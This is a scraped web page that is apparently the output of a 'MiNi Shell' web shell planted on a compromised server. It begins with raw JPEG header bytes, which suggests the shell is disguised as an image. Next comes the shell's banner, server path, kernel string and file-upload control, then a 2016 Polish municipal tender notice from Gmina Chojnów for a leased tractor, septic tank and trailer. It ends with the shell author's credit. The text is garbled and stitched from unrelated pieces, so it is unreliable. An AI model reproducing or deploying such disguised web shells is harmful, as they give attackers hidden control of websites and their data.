JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160229/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160229/20151-N-2016.html

<p class="kh_header"><b>Chojnów: Zakup i dostawa wraz z leasingiem ( na 5 lat):
 zestawu asenizacyjnego  do wywozu nieczystości płynnych ze zbiorników bezodpływowych na terenie Gminy Chojnów oraz osprzętu kompatybilnego z ciągnikiem rolniczym tj. przyczepa.</b><br>
<b>Numer ogłoszenia: 20151 - 2016; data zamieszczenia: 29.02.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Chojnów , ul. Fabryczna 1, 59-225 Chojnów, woj. dolnośląskie, tel. 076 8188504, faks 076 8187587.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gmina-chojnow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i dostawa wraz z leasingiem ( na 5 lat):
 zestawu asenizacyjnego  do wywozu nieczystości płynnych ze zbiorników bezodpływowych na terenie Gminy Chojnów oraz osprzętu kompatybilnego z ciągnikiem rolniczym tj. przyczepa..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem  zamówienia  jest    
Zakup i dostawa wraz z leasingiem ( na 5 lat):  zestawu asenizacyjnego  do wywozu nieczystości płynnych ze zbiorników bezodpływowych na terenie Gminy Chojnów oraz osprzętu kompatybilnego z ciągnikiem rolniczym tj. przyczepa. 
Opis przedmiotu zamówienia
I)  Ciągnik rolniczy
-  fabrycznie nowy, rok produkcji nie starszy niż 2014 r. i zarejestrowany;
-  spełniający polskie i europejskie wymogi w zakresie bezpieczeństwa oraz wymagania  
   poruszania się po drogach publicznych zgodnie z przepisami ustawy z dnia 20 czerwca  
   1997 prawo o ruchu drogowym (Dz. U. z 2012 r. po. 1137 z póź. zmian);
   SILNIK: 
-  moc silnika homologowana przy obrotach nominalnych od 105 do 110 KM, 
-  silnik wysokoprężny, 
-  liczba cylindrów 4,
-  pojemność skokowa od 3 000 do 5 000 cm3, 
-  układ zasilania paliwem wysokociśnieniowy,
-  typ paliwa - olej napędowy, 
-  norma emisji spalin Euro IV.  
   SKRZYNIA BIEGÓW I UKŁAD NAPĘDOWY: 
-  napęd 4 x 4 - na wszystkie 4 koła, 
-  skrzynia biegów: zsynchronizowana,
-  smarowanie: wymuszone z chłodnicą oleju przekładni, 
-  liczba biegów: min 16x16
-  smarowanie: wymuszone z chłodnicą oleju przekładni,
-  rewers do zmiany kierunku jazdy
-  prędkość jazdy do przodu max. 40 km/h, 
-  blokada mechanizmu różnicowego tylnego mostu
-  system automatycznego rozłączania blokady mechanizmów różnicowych i przedniego   
    napędu przy wyższych prędkościach jazdy.
   UKŁAD HYDRAULICZNY: 
-  pompa hydrauliczna o wydajności minimum 60 l/min., 
-  hydraulika zewnętrzna - przód oraz tył - gniazda z szybkozłączami,
-  gniazda hydrauliczne z odzyskiem oleju, 
-  przedni TUZ o udźwigu 2,7 t oraz tylny TUZ o udźwigu min. 4,300 t , 
-  cięgna regulowane mechanicznie - lewe.
    UKŁAD JEZDNY, KIEROWNICZY I HAMULCOWY: 
-  przednia oś napędowa,
-  ogumienia przednie standardowe,
-  ogumienia tylne standardowe,
-  błotniki przednie, 
-  błotniki tylne,
-  układ kierowniczy ze wspomaganiem - hydrostatyczny z niezależną pompą, 
-  układ hamulcowy do hamowania przyczep - instalacja pneumatyczna jednoobwodowa i  
   dwuobwodowa, 
   KABINA KIEROWCY - OPERATORA: 
-  komfortowa, ergonomiczna i wyciszona, 
-  siedzenie operatora amortyzowane, z pasem bezpieczeństwa, 
-  kierownica regulowana w min. 2 płaszczyznach, 
-  ew. siedzenie 2-go operatora,
-  wentylacja, ogrzewanie, 
-  szyba przednia nieotwierana, 
-  2 drzwi, 
-  wycieraczka przednia i tylna, 
-  lusterka zewnętrzne kabiny, 
-  oświetlenie przednie do ruchu prawostronnego, 
-  światła robocze w dachu kabiny z przodu i z tyłu,
-  światło obrotowe, błyskowe - ostrzegawcze.
   DODATKOWE WYPOSAŻENIE: 
-  zaczep tylny automatyczny regulowany góra-dół,
-  zaczep dolny - belka pociągowa oscylacyjna, 
-  instrukcja obsługi w języku polskim.
II)  Beczka asenizacyjna
-  fabrycznie nowa, rok produkcji nie starsza niż 2014 r. 
-  beczka asenizacyjna winna spełniać wymogi określone w rozporządzeniu Ministra   
   Infrastruktury z dnia 12 listopada 2002 r. w sprawie wymagań dla pojazdów asenizacyjnych  
   (Dz.U. Nr 193, poz. 1617).	

CHARAKTERYSTYKA TECHNICZNA:
- pojemność zbiornika: 10 000 litrów, 
- zbiornik: ocynkowany obustronnie z dodatkową pasywacją, 
- podwójny spaw z zewnątrz i wewnątrz,
- wewnątrz zbiornika dwa falochrony,
- wzmocnione podpory mocowania zbiornika do ramy;
- sprężarka, czas napełniania 6 min
- regulowana stopa podporowa,
- wąż ssawny o długości min. 6,0 m,
- przedłużka węża ssawnego - długość min. 4,0 m,
- ciśnieniowy zawór bezpieczeństwa,
- zawór przeciw przelewowy zabezpieczający pompę, 
- manowakuometr,
- filtr powietrza, 
- zawór tylny spustowy hydrauliczny, 
- wskaźnik poziomu napełnienia zbiornika przeźroczysty z pleksiglasu, 
- ilość wskaźników poziomu napełnienia zbiornika min. 2 szt., 
- oświetlenie drogowe wbudowane, 
- 3 króćce ssawne: boczne min. 2 szt. i tylne min. 1 szt., 
- instalacja hamulcowa pneumatyczna, 
- haki do mocowania węży z obu stron zbiornika, 
- wałek przegubowo-teleskopowy z 6-ma wypustami
- otwierana dennica tylnia
- 2 zasuwy mosiężne
- górny właz szybko otwieralny
- tłumik i odzyskiwacz oleju
- ilość kół - 4 
- ogumienie standardowe 
III)  Przyczepa
- fabrycznie nowa,  rok produkcji nie starsza niż 2014 r.
  spełniający polskie i europejskie wymogi w zakresie bezpieczeństwa oraz wymagania  
  poruszania się po drogach publicznych zgodnie z przepisami ustawy z dnia 20 czerwca  
  1997r.  prawo o ruchu drogowym (Dz. U. z 2012 r. po. 1137 z póź. zmian).
  WYPOSAŻENIE:
- dwuosiowa
- instalacja pneumatyczna jednoobwodowa
- trójstronny wywrót
- ładowność 6 tys. kg
- koła 11, 5 x 15,3    12 PR
- zaczep tylny zwykły
- burty pojedyncze
- bez nadstawek
- koło zapasowe,

Zamawiający dodatkowo wymaga: 
-  Zamawiający wymaga, aby wszystkie urządzenia oferowane były fabrycznie nowe, 
    kompletne, wyprodukowane nie wcześniej niż przed 2014 rokiem, posiadały wymagane  
    prawem atesty  i certyfikaty oraz nie wymagały żadnych dodatkowych nakładów i były   
    gotowe do pracy.
-  Dokumentacja ciągnika powinna być dostarczona w języku polskim i umożliwiać ich 
    rejestrację bez dodatkowych badań i testów oraz prawidłową eksploatację.
-  Przyjęcie dokumentacji, po jej analizie i akceptacji przez zamawiającego.
-  Przeprowadzenie testów sprawdzających pojazdów i urządzeń poprzedzające podpisanie  
    protokołu odbioru końcowego.
-  Gwarancja i serwis ciągnika i wozu asenizacyjnego oraz całego osprzętu - min. 36 miesięcy 
    bez limitu motogodzin, licząc od daty jego przyjęcia przez zamawiającego.
-  Z chwilą wymiany zespołu lub części w ramach gwarancji, następuje automatyczne   
   przedłużenie gwarancji odpowiednio na ten wyrób, zespół lub część, o okres jego wymiany.
-  Gwarancja dotycząca serwisu gwarancyjnego sprzętu:
- przyjazd serwisu do 12 godzin,
- usunięcie uszkodzenia do 48 godzin,
- przy dłuższym czasie naprawy niż 48 godzin, pojazd/maszyna zastępcza.
-   Odległość do punktu serwisowego stacjonarnego posiadającego uprawnienia producenta do
    wykonywania napraw gwarancyjnych - nie więcej niż 30 km od siedziby zamawiającego.
-   Świadczenie w okresie gwarancyjnym pełnego bezpłatnego serwisu wraz z   
    przeprowadzeniem bezpłatnych przeglądów okresowych i konserwacji zgodnie z  
    dokumentami gwarancyjnymi, koszt materiałów eksploatacyjnych ponosi Wykonawca (w   
    cenie niniejszego zamówienia);
-  Wykonawca przeszkoli 3 przedstawicieli zamawiającego, w uzgodnionym terminie oraz w 
    uzgodnionym miejscu
-  Wykonawca gwarantuje spełnienie wymagań rejestracyjnych obowiązujących w dniu  
   dostawy.
-  Wyrób będzie wyposażony w elementy takie jak, trójkąt ostrzegawczy, gaśnica oraz 
    apteczkę pierwszej pomocy i niezbędny zestaw kluczy.
-   Silniki jezdne i robocze zamawianych urządzeń powinny spełniać wymagania norm emisji 
    spalin aktualne w dniu dostawy. Pojazdy powinny posiadać homologację tam gdzie to  
    wymagane lub decyzję zwalniającą z uzyskania świadectwa homologacji. Urządzenia 
    powinny posiadać odpowiednie dokumenty potwierdzające spełnienie wymagań.
		  

              Uwaga:  Szczegółowe warunki leasingu operacyjnego z opcją wykupu znajdują się we  
                             wzorze umowy..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 16.70.00.00-2, 66.11.40.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 09.04.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium
1. Ustala się wadium w wysokości: 4.878,00 zł  (słownie: cztery tysiące osiemset siedemdziesiąt osiem złotych 00100).
3. Wadium wnoszone w formie pieniężnej należy wpłacić przelewem  na rachunek bankowy    
    zamawiającego:  BS Chojnów nr  64 8644 0000 0000 1384 2000 0030  z dopiskiem:
       Wadium do przetargu nieograniczonego na  Zakup i dostawa wraz z leasingiem 
       (na 5 lat):  zestawu asenizacyjnego  do wywozu nieczystości płynnych 
        nr  SOGCHZP22016 
     Zamawiający nie przyjmuje gotówki w kasie Urzędu.
4.  Termin wniesienia wadium w formie pieniężnej do dnia : 10.03.2016 r. do godz. 900,
      za termin jego wniesienia zostanie przyjęty termin uznania rachunku bankowego     
      zamawiającego (tj. datę faktycznego wpływu środków pieniężnych na konto  
      zamawiającego). 
   W przypadku wniesienia wadium w pieniądzu, do oferty trzeba  dołączyć  kserokopię                       przelewu.
   Wadium wniesione w pieniądzu zamawiający zwróci wraz z odsetkami,  wynikającymi     z  umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone          o koszty prowadzenia rachunku oraz prowizji bankowej za przelew pieniędzy,  na rachunek bankowy wskazany przez wykonawcę.
5.  Wadium wnoszone w formie:  poręczenia bankowego, gwarancji  bankowej  lub   ubezpieczeniowej -  w  sekretariacie  urzędu.
      W terminie do dnia : 10.03.2016 r. do godz. 900 za potwierdzeniem odbioru.
6.   Wykonawca, który nie złożył wadium w dopuszczonej w niniejszej  SIWZ  formie,     zostanie z postępowania wykluczony.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- wykażą, że  są ubezpieczeni od odpowiedzialności cywilnej z tytułu  prowadzonej działalności gospodarczej.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)   Zaakceptowany  wzór umowy  załącznik  nr 5  do siwz.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 85</li>
<li>2 - Gwarancja - 15</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana postanowień umowy
      1)   Zmiana umowy może być dokonana tylko za zgodą obu stron.
      2)   Wszystkie zmiany umowy dokonywane są w formie pisemnej i muszą być podpisane                            
             przez upoważnionych  przedstawicieli obu stron.
      3)   Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, dotyczących:
            a) terminu
               Termin zakończenia przedmiotu zamówienia ustalony w umowie może ulec zmianie  
               w przypadku wystąpienia  niżej  wymienionych okoliczności pod warunkiem, że mają   one wpływ na termin realizacji całego przedmiotu umowy.
               Okoliczności mogące spowodować zmianę terminu mogą wynikać z:
               -    działania  siły wyższej  (np. klęski żywiołowe, strajki generalne lub lokalne),
               -    ujawnienia w trakcie realizacji przedmiotu umowy niezidentyfikowanej                     
                     przeszkody,
               W okolicznościach wyżej wymienionych strony ustalają nowe terminy umowne,                             
                z tym że wielkość zmian musi być powiązana z przyczyną jaka ją spowodowała.
           b)  zmian osób reprezentujących strony umowy
               W przypadku   zmian osób uprawnionych do reprezentowania zamawiającego lub             wykonawcy strony dokonają stosownych zmian w umowie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gmina-chojnow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Chojnów, ul. Fabryczna 1, 59-225 Chojnów, pokój nr 310.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.03.2016 godzina 09:00, miejsce: Urząd Gminy Chojnów, ul. Fabryczna 1, 59-225 Chojnów, pokój nr 103 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com